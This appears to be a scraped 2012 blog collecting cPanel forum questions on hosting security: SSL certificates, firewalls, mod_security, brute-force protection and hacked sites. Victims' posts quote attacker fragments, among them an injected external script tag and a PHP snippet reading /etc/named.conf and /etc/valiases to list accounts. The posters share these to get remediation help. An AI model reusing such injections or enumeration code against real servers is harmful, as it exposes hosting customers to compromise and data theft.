What do I need to enable in cpanel to prevent users from creating symlinks to files they dont own?
symlinks to files not owned by the user
[Cpanel Blog] Add new User or what May,2012
Jumat, 06 Juli 2012
[Cpanel Blog] symlinks to files not owned by the user July,2012
Rabu, 04 Juli 2012
[Cpanel Blog] How to set retraction on uploading file type or extensions? July,2012
Hi,
I want to limit only files with approved extensions such as ".gif", ".jpeg", ".doc", etc. are allowed to be uploaded to the web server. This is vitally important for my server's security, since the web server might attempt to execute or specially process files with extensions like ".php", ".cgi", etc.
Anybody can advice how and where can I set / configure to set restriction to upload file according to below Logic:
# Deny All File extension
# Except : .gif , .jpg , .pdf , .png.
Any help is highly appreciated.
How to set retraction on uploading file type or extensions?
[Cpanel Blog] Incomplete SSL Chain problem in Firefox June,2012
Sabtu, 30 Juni 2012
[Cpanel Blog] disable special php.ini features with suexec June,2012
Hi,
we are using suexec in order to provide each customer with an own php.ini; is there any possibility to prevent the customers from setting safe_mode to off in their php.ini?
Kind regards,
Christian
disable special php.ini features with suexec
Cpanel Blog Installing a UCC SSL Cert May,2012
[Cpanel Blog] php 5.2.17 security backports question June,2012
Hello,
I run the default apache (2.2.22) and php installation (5.2.17) and installed using easyapache through cpanel/WHM.
Secunia dot com released several security vulnerability notifications today that affect php 5.3x and 5.4x (and presumably 5.2x as well but I could be wrong).
Some of these vulnerabilities were reported today and others about a month ago. Have they already been backported to php 5.2.17 by the cpanel team when installed using easyapache? If not, will they? Or is the only choice to upgrade to the latest version of php 5.3x or 5.4x to be protected against these latest vulnerabilities?
We run many websites and unfortunately trying to get the web developers to update their code to work with php 5.3x and newer is a PITA. I'd still like to run php 5.2x but not if it's going to lead to the server getting rooted through arbitrary code execution vulnerabilities in php 5.2x.
Any info or tips are greatly appreciated.
Thank you!
secunia dot com/advisories/49731/ (cve's listed here)
secunia dot com/advisories/49014/ (cves listed here)
php 5.2.17 security backports question
Cpanel Blog Strange email with attachment from "cpanel" May,2012
[Cpanel Blog] Using PHP to add a custom security policy June,2012
Hi, I just read http://www.cpanel.net/secpolicy.pdf
I was wondering if it's possible to add a custom security policy using PHP?
The PDF seems to mention Perl only.
Using PHP to add a custom security policy
[Cpanel Blog] Share your Mod Security configuration May,2012
Kamis, 28 Juni 2012
[Cpanel Blog] security problem, php and html files vulnerability June,2012
from 2 days I have a problem with some accounts on my some vps with cpanel.
I must find and replace specific string in all accounts, I find in all files php and html on some ftp root this:
<script type="text/javascript" src="http://domainname.com/wp-content/uploads/process.js"></script>
in first line for every file and I must run a conbination od find and sed command for remove it
security problem, php and html files vulnerability
Cpanel Blog can't access our website May,2012
[Cpanel Blog] How can I temporarily NULL ROUTE one of my own IPs? June,2012
I am getting hit by a DDOS SYN FLOOD attack on a couple of currently unused IPs that have been configured on my server.
I just want to remove these IPs temporarily, so that no response (e.g. from Apache) is sent out to the remotely connecting IP.
I know I can have my data center NULL ROUTE these IPs for me, but I would rather just do it myself via shell, or in WHM.
Can this be easily accomplished?
Yes, we have CSF and the SYNFLOOD protections switched on, but at this point I would rather just pull the IPs for a while.
By the way, they are hitting port 443 rather than port 80 for some reason.
Thanks for any ideas here!
How can I temporarily NULL ROUTE one of my own IPs?
[Cpanel Blog] Security bug in cPanel login May,2012
Selasa, 26 Juni 2012
[Cpanel Blog] URGENT: mod_security trivial bypass in versions < 2.6.6 (cpanel uses 2.6.3) June,2012
I've just learnt that there is an exploit in the wild which makes it trivially easy to bypass mod_security any version prior to 2.6.6
Easyapache is currently bundling 2.6.3 which is vulnerable.
Can 2.6.6 be included in easyapache ASAP ? And if it's going to take weeks to implement, is there any way we can manually mod_security to 2.6.6 until EA has it?
URGENT: mod_security trivial bypass in versions < 2.6.6 (cpanel uses 2.6.3)
Cpanel Blog Directing http to https May,2012
Minggu, 24 Juni 2012
[Cpanel Blog] DNS redirection June,2012
Hello,
i have a question , i have a didicated server with cpanel , and i want for exemple when someone change the nameservers of the domain name to my namservers ns1.myhost.com and ns2.myhost.com it will show a page , because now it doesn't show anything only if the domain is added as account .
Thank you
DNS redirection
[Cpanel Blog] Lost password May,2012
Jumat, 22 Juni 2012
[Cpanel Blog] WHM Attack June,2012
I recently got attacked on my VPS ( which is a hosted VPS with WHM / cPanel on it)
I have cphulk active on it and locks them out after 3 attempts but somehow my root password got changed and a customers site had nice "you've been hacked" messages on it.
What can I do to protect WHM / cPanel?
Help!
WHM Attack
[Cpanel Blog] Security bug in cPanel login May,2012
Rabu, 20 Juni 2012
[Cpanel Blog] Pingdom inaccurate results needs whitelisting - firewall rule update error June,2012
Hi,
we use pingdom's free version to monitor whether our site is up/down.
It sometimes gives a series of 'server down' email alerts when the website can actually be reached quite normally.
It would be easy to write it off as a buggy service that gives wrong or inaccurate results, except for the fact that a lot of pingdom users seem to be very happy and sure that pingdom alerts are fairly accurate.
It seems that it is mostly a firewall issue - where if you have blocked an IP range due to some malicious activity from that region, and pingdom happens to have a server in that IP range, it reports a down alert as the ping is blocked.
These are the relevant links I found:
Simple tool to list Pingdom Probe IPs
Automatically update iptables rules for Pingdom monitors. | Personal blog of Chris Ergatides
Automatically update Pingdom firewall rules | MG IT Solutions
However when I tried out the last one - a script named update_pingdom_servers.sh, it gave a series of errors:
Quote: iptables: Bad rule (does a matching rule exist in that chain?)
iptables: No chain/target/match by that name We are using csf+lfd as well and every blacklist entry in cphulkd is also entered into csf+lfd blacklist manually.
The alternative, as far as I understand would be to manually whitelist the IPs from the pingdom IP feed here: https://my.pingdom.com/probes/feed
Any pointers on how to fix this?
Any help is greatly appreciated.
Thanks in advance,
Dave
Pingdom inaccurate results needs whitelisting - firewall rule update error
Cpanel Blog can't access our website May,2012
Sabtu, 16 Juni 2012
[Cpanel Blog] mod_security Ruleset comparsions June,2012
What are cPanel admins opinion of the various rulesets available for mod_security and how well they work on cPanel hostings 11.32 and up.
Which rulesets offer better integration into cPanel
Is it possible to automatically have the latest rulesets applied
Are there an caveat for using particular rule sets?
besides gotroot and OWASP ModSecurity Core Rule Set are there other rule sets users would recommend?
mod_security Ruleset comparsions
[Cpanel Blog] Beast TLS Vulnerability May,2012
[Cpanel Blog] Prevent other apps from sending mail besides exim June,2012
We have exim running on a server and got a notice that a client is sending spam. Unfortunately the mail is not going through exim as far as I can tell and there's nothing in the logs about it as a result.
How can we prevent other scripts that are running perhaps (couldn't find it in the process list currently but maybe they were before) from using outbound port 25? I only want exim to be able to use it.
Prevent other apps from sending mail besides exim
[Cpanel Blog] Is cPHulk working properly? June,2012
Jumat, 15 Juni 2012
[Cpanel Blog] Best Anti Virus software for linux centos cPanel/WHM June,2012
Hello,
can you guys let me know Best Anti Virus software for linux centos cPanel/WHM ???
Please don't suggest me ClamAV its really poor, recently our client's website got Hacked by the hackers & i scanned that website to check how many pages are infected, but ClamAV says website is OK
Best Anti Virus software for linux centos cPanel/WHM
[Cpanel Blog] Site Down due to IP flood? May,2012
[Cpanel Blog] Clients unsuspending suspended locked accounts. June,2012
I have users that are unsuspending accounts at will when I lock and suspend an account.
How do I fix this?
Clients unsuspending suspended locked accounts.
Cpanel Blog Globalsign OneClickSSL WHM/cPanel Addon Not Working May,2012
[Cpanel Blog] Notified of compromised account: Where to go from here June,2012
A wordpress site on 1 of my hosts running WHM 11.32.3 build 19 was listed as a phishing website. I've disabled the account but I was hoping for advise on where to go from here to try and find as much detail as possible as to how the site was compromised and how to improve my security to stop it happening in the future as I have other wordpress sites.
The site admin of the compromised site can be considered awol
Notified of compromised account: Where to go from here
[Cpanel Blog] Report of a cpanel CSRF 0 day on twitter May,2012
Kamis, 14 Juni 2012
[Cpanel Blog] How to disallow normal user read named.conf file? June,2012
Hacker run a PHP script on an user account and can list all the domains and users on the same server. I have no evidence showing they can get the password, but it's not good to reveal the user ID.
The script is simple, it gets the domain name from /etc/named.conf file, then get the users from /etc/valiases/. I tested with a normal user, but it does not have permission to read the files under /etc/valiases/. How can this PHP script read it?
Thanks for any help.
Code: ls -lah /etc/valiases/
/bin/ls: /etc/valiases/: Permission deniedHack code snippet:
Code: $d0mains = @file("/etc/named.conf"); Code: $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
How to disallow normal user read named.conf file?
[Cpanel Blog] CSF and Google bots ??? May,2012
[Cpanel Blog] MySQL vulnerability June,2012
Hello,
oss-sec: Security vulnerability in MySQL/MariaDB sql/password.c
Are the cPanel MySQL binaries vulnerable?
Thank you,
Nibin.
MySQL vulnerability
[Cpanel Blog] Security bug in cPanel login May,2012
[Cpanel Blog] whm save password June,2012
For those of us who are the only user of our particular computer, having the "save password"
makes it difficult to periodically change the password for WHM, especially using the google
chrome browser. In WHM, there should be a "check box" to "check" to save the password
or leave "unchecked" to not save it; this should be an option in the "settings" config,
similar to Allow autocomplete in login screens, perhaps the next line in the WHM settings. .
If programmed properly, it SHOULD update the pass that is saved upon login, rather than forcing
us to delete all cookies, cache, etc. , whenever we would like to change the password, such as after a certain time period or whatever other criteria we utilize to change password..
Thank you for all the improvments over the years to cPanel & WHM.
whm save password
[Cpanel Blog] Ip in spamhaus CBL May,2012
[Cpanel Blog] Jailed SSH? June,2012
Hey guys! I'm currently trying out CPanel as I'm thinking about moving from Plesk.
In Plesk I have a option under the settings for an account that says "Chrooted" for SSH access. When choosing this mode the user is jailed to his home directory and can't browse anything below it. Also the commands are very restricted and only allows about 100 of them.
In Cpanel I've set the user account to "Jailed Shell" but I don't see any different really. I have 1257 commands to use, and when logged in as root I have 1279 commands. Also I can browse below my home directory and even list /.
Isn't there any settings to jail the SSH user to a certain amount of commands and of course their home directory?
I use GIT to update all my clients on the server so I need SSH access.
Jailed SSH?
[Cpanel Blog] Trouble installing LCAP on new 64bit server. May,2012
Minggu, 10 Juni 2012
[Cpanel Blog] Comparison of Firewalls June,2012
Hello staff,
In your opinion, what is the best firewall listed below? And Why?
Firewalls: CSF | APF/BFD | FireStarter | Shorewall
If you know any firewall better than the ones mentioned above, post the name for us. :)
Comparison of Firewalls
[Cpanel Blog] Intsalling SAN SSL Certificate May,2012
[Cpanel Blog] Custom Security Police June,2012
I need to create a custom security police: http://www.cpanel.net/secpolicy.pdf
The idea is to block access to WHM only for the users in the Wheel Group unless they are accessing from a determined IP Range.
That way we could avoid potential hacks using the unfamous "scripts2/doautofixer?autofix=safesshrestart". (That script null any other security measure done to avoid undesired connections via SSH)
Any ideas where to start?
Any "Hello Word" security policy?
Regards
--
En Ibague - Comunidad de Ibague - Inicio
Custom Security Police
[Cpanel Blog] multiple servers sharing security information May,2012
[Cpanel Blog] Incomplete SSL Chain problem in Firefox June,2012
I've just rebuild my server after a disk failure and mostly things have gone smoothly.
When I installed the SSL cert for one of my domains, I used the same procedure as with every other SSL cert I've installed. The server auto-detected the key and the CA bundle just fine and in all browsers except firefox, the cert loads without error.
For this one site, Firefox reports an invalid certificate chain, and the SSL test at https://www.ssllabs.com/ssltest/index.html reports incomplete chain.
I've gone to comodo and downloaded their full CA bundle and installed it. I've checked the apache config files and it is serving the CA bundle I expect and I've checked and the CA bundle is identical to other domains on the server with certs from the same provider.
The only difference I can find is the QUALYS SSL Labs reports the chain length for a site without this problem is 3 (3788 bytes) and for the site with this problem as 1 (1318 bytes)
What I can't figure out is - where/how is this chain length being specified?
Did I just get a bum cert and it needs to be re-issued, or is there some other problem here.
Incomplete SSL Chain problem in Firefox
[Cpanel Blog] Apache security May,2012
Jumat, 08 Juni 2012
[Cpanel Blog] Single SSL certificate, multiple services + Apache June,2012
Hi,
Done quite a few searches about this, but I do need a confirmation from an expert (Where are thou Tristan?) about a few questions I have:
A) On the "Manage Service SSL Certificates" page: can I install a single purchased certificate, issued for my hostname (host.mydomain.com), on all and every services (Exim, Dovecot, etc.) AND as a shared SSL certificate (which covers SSL for Apache only I gather)?
B) On the "Install a SSL Certificate and Setup the Domain" page: for the Apache shared SSL certificate, do I set the user to "nobody"?
C) Does the third textarea of the page listed in point B) with the "Paste the ca bundle here (optional)" caption needs to be filled with the Intermediate CA Certificate (I bought a positiveSSL certificate from Comodo)?
D) Is there any other specific steps outside of these two pages that I should consider to accomplish my goal of eliminating all warnings for my system as a whole?
E) When the certificate renewal comes, what is the least painful way to accomplish it (link welcomed)?
I will consider any human answering these questions as a personal friend to the death or until my server crashes and burns, whichever comes first.
Thanks :-)
Single SSL certificate, multiple services + Apache
[Cpanel Blog] specific rule on modsecurity to scan any uploaded file May,2012
[Cpanel Blog] Is cPHulk working properly? June,2012
I'm not sure if cPHulk is working properly or not. Could somone please confirm this for me.
The Logwatch email shows the following attempted attacks.. All the IPs have been blocked, but I'm not sure if its before or after the numbers got so high. I also noticed that the usernames had up to 1323 login attempts but were blocked for two weeks for 30 attempts.
Logwatch email (I've stripped out the IPs)
Failed logins from:
IP1: 333 times
IP2: 1374 times
IP3: 210 times
IP4: 223 times
Illegal users from:
IP1: 3520 times
IP2: 2815 times
IP3: 427 times
IP4: 9948 times
My settings
IP Based Brute Force Protection Period in minutes: 15
Brute Force Protection Period in minutes: 5
Maximum Failures By Account: 15
Maximum Failures Per IP: 10
Maximum Failures Per IP before IP is blocked for two week period: 30
Send a notification upon successful root login when the IP is not whitelisted: off
Extend account lockout time upon additional authentication failures: on
Send notification when brute force user is detected: off
Is cPHulk working properly?
[Cpanel Blog] how to protect whm/cpanel (the host web application ) using mod_security? May,2012
Rabu, 06 Juni 2012
[Cpanel Blog] disable cphulk per-account blacklists June,2012
On every server I set up, it always ends within a few days that an indeterminable number of foreign servers have pounded enough on the server login to lock-out the "root" login account (and several others), and continue to do so such that the accounts stay locked indefinitely. Essentially this turns cphulkd into a DDoS assistance toolkit.
I don't mind the idea of blacklisting IP addresses -- there's nothing wrong there. But I need to be able to disable the per-account lockout functionality. I though that setting "Maximum Failures By Account" to "0" would do this. But it apparently does not -- it instead locks out accounts after the first login failure.
Is there a way to disable the account lockout function? Or do we just have to throw away cphulk completely?
Also, for the love of all that's holy, don't suggest whitelists. It doesn't solve the problem, just pushes it around a little.
disable cphulk per-account blacklists
Cpanel Blog Directing http to https May,2012
[Cpanel Blog] Do I need ipv6 enabled? June,2012
This may be a dumb question, but frankly I do not know the answer. I have always used CSF on my server and have disabled ipv6 as recommended by it.
Now, I am starting to wonder if this was the correct thing to do? Am I preventing others in the world from accessing the domains, email, etc hosted on my server by having ipv6 disabled? Basically I am just wondering if 'people' trying to view my websites, send email to me, etc are being denied access if that makes sense.
- All of 'my' ip's associated with the server are ipv4
- WHM 11.32.2 (build 28)
- CENTOS 5.8 x86_64 standard
Do I need ipv6 enabled?
Cpanel Blog Directing http to https May,2012
Senin, 04 Juni 2012
[Cpanel Blog] cPanel Security Measures June,2012
Can anyone please guide what security steps are necessary while setting up a new cpanel server? I would like to keep it the most secure for my clients so that they are not affected by exploits in WordPress and other content management systems.
cPanel Security Measures
[Cpanel Blog] Mod_Evasive May,2012
[Cpanel Blog] ...A new self-signed certificate was installed to replace it. June,2012
This morning (June 1) I began getting warning messages when trying to check email that our secure certificate was expired. Since everyone is connecting to SSL ports for email, everyone got the message when trying to do a send/receive and was prevented from doing so until I could reset the cert. This is the message I was sent from WHM:
"The SSL certificate for courier-imapd on server.domain.com expired. A new self-signed certificate was installed to replace it."
"The SSL certificate for courier-pop3d on server.domain.com expired. A new self-signed certificate was installed to replace it."
If you purchased the expired certificate from a certificate authority, you should replace the self-signed certificate as soon as possible. You can do this using WHM's "Manage Service SSL Certificates" interface: https://server.domain.com:2087/scrip...ageservicecrts (Main >> Service Configuration >> Manage Service SSL Certificates)"
Why did this occur? We use a wildcard cert that doesn't expire until 2015 for all our services located in "Main >> Service Configuration >> Manage Service SSL Certificates" and only the mail related certs were reset by WHM, thankfully, but I would like to know if this can be prevented in the future.
Thanks,
Michael
...A new self-signed certificate was installed to replace it.
[Cpanel Blog] I need help -- server got hacked, php injection May,2012
Sabtu, 02 Juni 2012
[Cpanel Blog] Root was logged into dovecot using following authentication service: system June,2012
Root was logged into dovecot using following authentication service: system
Reverse DNS: r54h244.dixie-net.com
Origin Country: United States (US)
Please use the following links to add to the black list:
Single Ip: https://server.name:2087/cgi/bl.cgi?ip=64.49.54.244
I have swapped mail server selection back to Courier, not sure if they could have done more harm?
Ok, False Alarm it seems, but thousands of access attempts.
Not sure why my firewall didn't stop him in time.
Root was logged into dovecot using following authentication service: system
[Cpanel Blog] Trouble installing LCAP on new 64bit server. May,2012
[Cpanel Blog] WHM password only 8 chars long! June,2012
If you set the root whm password to e.g. 1234567890123, you can login even if you type only 12345678 !!!
It seems that characters after the 8th are ignored!
WHM password only 8 chars long!
[Cpanel Blog] PCI Complianc with SecurityMetrics - Weak Ciphers May,2012
Rabu, 30 Mei 2012
[Cpanel Blog] multiple servers sharing security information May,2012
Since I've got multiple cPanel servers, I'd like them to share information regarding various security aspects. Maybe someone has already done this, so I'd appreciate some help.
I would like my servers to "transfer" (via scp for example) various updates (via diff files maybe?) of things like these:
/etc/spammeripblocks
cphulkd blacklist
iptables bans
etc..
Something that works like the current DNS cluster would be best. Servers synchronizing various updates among them.
Is there a Linux utility that can help me? or should I just build my own set of shell tools for that based on things like scp and diff?
Any help would be appreciated.
multiple servers sharing security information
Cpanel Blog How to force secure login to _private folder? May,2012
[Cpanel Blog] Mod_Evasive May,2012
we installed Mod evasive on our testing server and followed the article
http://systembash.com/content/how-to...h-mod_evasive/
Can anyone tell us how we can test Mod_Evaisve with CSF firewall. when we try to refresh pages again and again CSF does not seem to block the IP.
Mod_Evasive
[Cpanel Blog] CSF and Google bots ??? May,2012
[Cpanel Blog] I need help -- server got hacked, php injection May,2012
Hello,
I have 290 hosted sites.
For some vulnerability in joomla, (what I'd consider), some people managed to insert malicious files in the tmp folder of some domains, and executed them.
Several shell scripts encrypted (such as c99shell) were injected. Most of the process in my server was being killed every minute.
I also found a script that list the cpanel users of all domains in my server and email bomber scripts.
And what worries me most:
Joomla stores the information related to the database in a file called configuration.php.
90% of the sites that I host are made in Joomla.
I found a perl script in some domains that scans for files configuration.php, config.php, wp-config.php in all domains on my server, and saves a copy in a file .txt
That makes possible to have access to all databases on my server, everything, including WHMCS, Worldpress, Magento, and Drupal databases..
My question is:
I need to change the password for all databases, and also change them in the configuration.php file, but I do not know one way to do this automatically.
Is there is a script that does this change either in the configuration.php file and in mysql?? (mysql user password)
I have no idea how to do this. I'm using "grep" to find the malicious files on the server, since I have to delete them before making any changes to mysql.
Last question: Was it a problem in Joomla (very onder 1.5 version) or was it because my /tmp folder was not in a isolated partition? (I use OpenVZ).
I also have no rules in mod_security running, because they were causing problems in my wordpress sites.
Furthermore, grep is dramatically increasing the server load..
Any help will be highly appreciated.
Edit: I have all the IPs in Apache logs, are from Nigeria .. But I'm sure these IPs will not help much.
I need help -- server got hacked, php injection
Cpanel Blog Directing http to https May,2012
Senin, 28 Mei 2012
[Cpanel Blog] Reserving passive ftp port range? May,2012
To get my ftp server working completely I had to assign a port range for it to use for passive connections but that port range is not reserved. I would rather not have open ports for people on my server to take advantage of so is there a way to reserve the ports for pure-ftpd only?
Reserving passive ftp port range?
[Cpanel Blog] Suhosin : custom setting Per user account May,2012
[Cpanel Blog] Report of a cpanel CSRF 0 day on twitter May,2012
I found this in my twitter feed this morning:
[webapps / 0day] - Cpanel 11.X Multiple CSRF Vulnerability /http://t.co/My79Xgmg/
Haven't had a chance to try it yet.
Report of a cpanel CSRF 0 day on twitter
Cpanel Blog How to force secure login to _private folder? May,2012
[Cpanel Blog] Password Reset Feature May,2012
Hello,
I want to enable this password reset option because sometime users forget their passwords and they call me to reset but sometime i cant reach near computer... So just want to know is it secure to enable it? and if it is secure then why there is written default setting is off for this? If it is ok to enable and no any hacking attempts made can i enable it?
Password Reset Feature
[Cpanel Blog] What to do about Ddos attacks to my server? May,2012
Kamis, 24 Mei 2012
[Cpanel Blog] Security bug in cPanel login May,2012
Hi,
turns out this is probably the easiest way to report a problem...
You have (what I'd consider) a security bug in your cPanel login system. On a reseller account (for example) if a user has the same password as the administrator then even if the user logs into their site with their username and their password (which happens to be the same as the admin) then they get logged in as the admin! = Not good!!
James
Security bug in cPanel login
[Cpanel Blog] Is it neccessary to setup manual clam scan? May,2012
[Cpanel Blog] Share your Mod Security configuration May,2012
If you all would not mind to share your custom Mod Security configuration from WHM. This I feel would helpful for those who want to piece together and write their own Mod Security configuration file.
Share your Mod Security configuration
[Cpanel Blog] reporting abuse proceedure? May,2012
[Cpanel Blog] Ip in spamhaus CBL May,2012
Our IP address was listed in CBL of spamhaus, is it really caused by a backdoor trojan? How can I find it and who uploaded the script?
Thanks to all of you guys.
Ip in spamhaus CBL
[Cpanel Blog] Site Down due to IP flood? May,2012
Selasa, 22 Mei 2012
[Cpanel Blog] More and more "closed by DROP in ACL" in exim logs. May,2012
I'm seeing more and more of these kinds of entries in the exim_mainlog file:
2012-05-20 03:36:37 SMTP connection from (hxsf8pgx3x2uk) [41.136.196.2]:34124 closed by DROP in ACL
2012-05-20 03:36:43 SMTP connection from (bxkqlnohhfh) [110.172.150.2]:42054 closed by DROP in ACL
2012-05-20 03:37:23 SMTP connection from (windows-xp) [218.48.74.98]:42242 closed by DROP in ACL
2012-05-20 03:37:27 SMTP connection from (dell-2e58bfb0ba) [182.182.60.148]:16332 closed by DROP in ACL
2012-05-20 03:37:39 SMTP connection from (bubu-b74b3fbaa7) [89.137.235.17]:25125 closed by DROP in ACL
2012-05-20 03:38:01 SMTP connection from (school-0a0b7ad4) [106.66.249.123]:3029 closed by DROP in ACL
All of the IPs in such entries seem to be from notoriously shady sources, e.g. Iran, Korea, Russian Federation, and so on. We are seeing anywhere from 2 to 20 per minute of these "closed by DROP in ACL" log entries.
I'm guessing that that this is Exim protecting itself from likely spam probes or something to that effect. But I am wondering if these guys are taking up POP ports with these attacks? And do you suppose it would be worth writing a script to drop these IPs in the server firewall, at least for the ones that hit the server repeatedly, i.e. for the worst offenders?
Thanks much.
More and more "closed by DROP in ACL" in exim logs.
[Cpanel Blog] Trouble installing LCAP on new 64bit server. May,2012
Minggu, 20 Mei 2012
[Cpanel Blog] Version scans May,2012
Hey guys,
I'm aware there are a LOT of security plugins. But I've been through a large number and most appear focussed on either detecting intrusions, or providing "generic" filters.
I'm considering this.
90% of our hosts just run a Wordpress installation.
90% of those never update it.
A plugin that would simply email me and say "these four accounts have out of date Wordpress installations" sounds interesting.
Does such a thing exist? I'm interesting in a development effort once I'm sure I'm not covering someone elses ground.
Version scans
[Cpanel Blog] Site Down due to IP flood? May,2012
Jumat, 18 Mei 2012
[Cpanel Blog] Site Down due to IP flood? May,2012
Hi,
My site has been going down recently and I have checked NETSTAT (please see attached)
Do you think this is what is causing the problem?
Thanks,
Danny Attached Files 
test.txt (189.0 KB)
Site Down due to IP flood?
[Cpanel Blog] Is it neccessary to setup manual clam scan? May,2012
[Cpanel Blog] how to protect whm/cpanel (the host web application ) using mod_security? May,2012
Hi,
I just wondering how could I protect the whm/cpanel by the help of mod_security.
I mean when I try to enter to whm panel using port 2086 I want to add more constraints on my mod_Security so he can be able to protect cpanel/whm.
At the moment I'm not able to do that.
cheers
how to protect whm/cpanel (the host web application ) using mod_security?
[Cpanel Blog] Suhosin : custom setting Per user account May,2012
[Cpanel Blog] Apache security May,2012
Do I have to run patch described at below URL. I am running apache-2.2.22 build date 1st March
http://forums.cpanel.net/f185/how-pr...tml#post996441
I was a victim of this issue the day before yesterday
Apache security
[Cpanel Blog] reporting abuse proceedure? May,2012
[Cpanel Blog] What to do about Ddos attacks to my server? May,2012
Howzit...
Had a Ddos attack last week...
What is the best action to take?
Thanks...
What to do about Ddos attacks to my server?
Cpanel Blog PHP 5.3.12 Security Vulnerability Patch May,2012
Rabu, 16 Mei 2012
[Cpanel Blog] Lost password May,2012
Hello, my name deroch I am Belgian and since yesterday I forgot my password to access CPanel. I contact my herberger -removed link-, but he does not answer.
Will you help me get my password?
Sorry for my English
I need help please : (
Lost password
Cpanel Blog Globalsign OneClickSSL WHM/cPanel Addon Not Working May,2012
[Cpanel Blog] The site's security certificate is not trusted! May,2012
Hi Everyone
I am new to this forum and to cPanel so please forgive my ignorance and I am sorry if I have put this thread in the wrong place.
I have a dedicated server that uses WHM and cPanel with a small number of hosting accounts on it.
All has been going well with it until recently when I spoke to my supplier about how I could get Parked Domains to work on my accounts.
The supplier talked me through the process which was basically to go to tweaks and change a setting.
After doing this the issue with Parked Domains was solved and all was well and good.
I then noticed that any time myself or one of my clients tried to log into cPanel or Webmail we now got a warning screen with "The site's security certificate is not trusted!".
Now my supplier is telling me I will need to buy a SSL certificate to stop the warning message.
My questions are these:
Why would a small change to WHM cause such an issue?
How could I have had a https connection before and now I don't, is there some sort of certificate provided with new installs of WHM? Sorry I am pretty ignorant on certificates as you can probably tell.
Is it unreasonable of me to ask for the system to be put back to how it was without buying a certificate? Can that even be done?
I am not trying to be mean or anything and I am happy to buy a certificate if I need one but it is more the issue that it did work and now it does not and I just hate not knowing what caused a problem or how it was working before the simple change.
Any advice or guidance on this is greatly appreciated
Alex
The site's security certificate is not trusted!
[Cpanel Blog] Beast TLS Vulnerability May,2012
[Cpanel Blog] PCI Complianc with SecurityMetrics - Weak Ciphers May,2012
Hi,
I'm been having a hard time with passing a securitymetics scan.
The problem seems to be related to ports 443 and port 465 supporting weak ciphers.
I have followed all the recommendations to disable ss2 and low and medium ciphers for exim and openSSL.
However, securitymetrics techs just emailed me the following:
Any idea please!
----------------------------------------------------------------------------------------
Here is the list of SSL ciphers supported by the remote server Host
Low Strength Ciphers (< 56-bit key)
TLSv1
EXP-EDH-RSA-DES-CBC-SHA Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-DES-CBC-SHA Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-RC2-CBC-MD5 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC4-MD5 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
High Strength Ciphers (>= 112-bit key)
TLSv1
EDH-RSA-DES-CBC3-SHA Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1
DHE-RSA-AES128-SHA Kx=DH Au=RSA Enc=AES(128) Mac=SHA1
DHE-RSA-AES256-SHA Kx=DH Au=RSA Enc=AES(256) Mac=SHA1
DES-CBC3-SHA Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1
AES128-SHA Kx=RSA Au=RSA Enc=AES(128) Mac=SHA1
AES256-SHA Kx=RSA Au=RSA Enc=AES(256) Mac=SHA1
==========================================================================
Once these ciphers have been disabled a new scan should be ran to remove the issues.
--------------------------------------------------------------------------------------------------------------
Here's what I got from my server:
root@dipel [/home/user]# openssl ciphers
Code: DHE-RSA-AES256-SHA:DHE-DSS-AES256-SHA:AES256-SHA:KRB5-DES-CBC3-MD5:KRB5-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:EDH-DSS-DES-CBC3-SHA:DES-CBC3-SHA:DES-CBC3-MD5:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA:AES128-SHA:RC2-CBC-MD5:KRB5-RC4-MD5:KRB5-RC4-SHA:RC4-SHA:RC4-MD5:RC4-MD5:KRB5-DES-CBC-MD5:KRB5-DES-CBC-SHA:EDH-RSA-DES-CBC-SHA:EDH-DSS-DES-CBC-SHA:DES-CBC-SHA:DES-CBC-MD5:EXP-KRB5-RC2-CBC-MD5:EXP-KRB5-DES-CBC-MD5:EXP-KRB5-RC2-CBC-SHA:EXP-KRB5-DES-CBC-SHA:EXP-EDH-RSA-DES-CBC-SHA:EXP-EDH-DSS-DES-CBC-SHA:EXP-DES-CBC-SHA:EXP-RC2-CBC-MD5:EXP-RC2-CBC-MD5:EXP-KRB5-RC4-MD5:EXP-KRB5-RC4-SHA:EXP-RC4-MD5:EXP-RC4-MD5
PCI Complianc with SecurityMetrics - Weak Ciphers
Cpanel Blog PHP 5.3.12 Security Vulnerability Patch May,2012
Selasa, 15 Mei 2012
[Cpanel Blog] Add new User or what May,2012
A friend of mine asked how to add a developer (I'm sure they'd be temporary) to their cPanel.
I think they would only want to add an FTP user.
What is the way they should handle this?
Add new User or what
[Cpanel Blog] Intsalling SAN SSL Certificate May,2012
[Cpanel Blog] IPTABLES Issue, not saving in CentOS 6.2 May,2012
Hi,
I'm using CentOS 6.2 86_64 with CloudLinux and it seems IPTABLES is not saving.
I am trying to make it that you can only access whm on our main IP of the server. But trying other IPs I can still connect to WHM.
I have tried
iptables -A INPUT -s ! xxx.xxx.xxx.xxx -p tcp --dport 2082:2087 -j DROP
which warns Using intrapositioned negation (`--option ! this`) is deprecated in favor of extrapositioned (`! --option this`) and after a save I can still access WHM on other IPs
iptables -A INPUT -s xxx.xxx.xxx.xxx -p tcp --dport 2082:2087 -j DROP
which no errors but after save I can still reach WHM on that IP.
IPTABLES Issue, not saving in CentOS 6.2
[Cpanel Blog] Beast TLS Vulnerability May,2012
Senin, 14 Mei 2012
[Cpanel Blog] error install ConfigServer Security&Firewall May,2012
ERROR:
[root@ns204624 csf]# perl /etc/csf/csftest.pl
Testing ip_tables/iptable_filter...OK
Testing ipt_LOG...OK
Testing ipt_multiport/xt_multiport...OK
Testing ipt_REJECT...OK
Testing ipt_state/xt_state...OK
Testing ipt_limit/xt_limit...OK
Testing ipt_recent...OK
Testing xt_connlimit...FAILED [Error: iptables: Unknown error 4294967295] - Required for CONNLIMIT feature
Testing ipt_owner/xt_owner...FAILED [Error: iptables: Unknown error 4294967295] - Required for SMTP_BLOCK and UID/GID blocking features
Testing iptable_nat/ipt_REDIRECT...OK
RESULT: csf will function on this server but some features will not work due to some missing iptables modules [2]
error install ConfigServer Security&Firewall
Cpanel Blog Root logins from single unknown IP - what next steps, suspicious changes May,2012
[Cpanel Blog] Suhosin : custom setting Per user account May,2012
Hello :
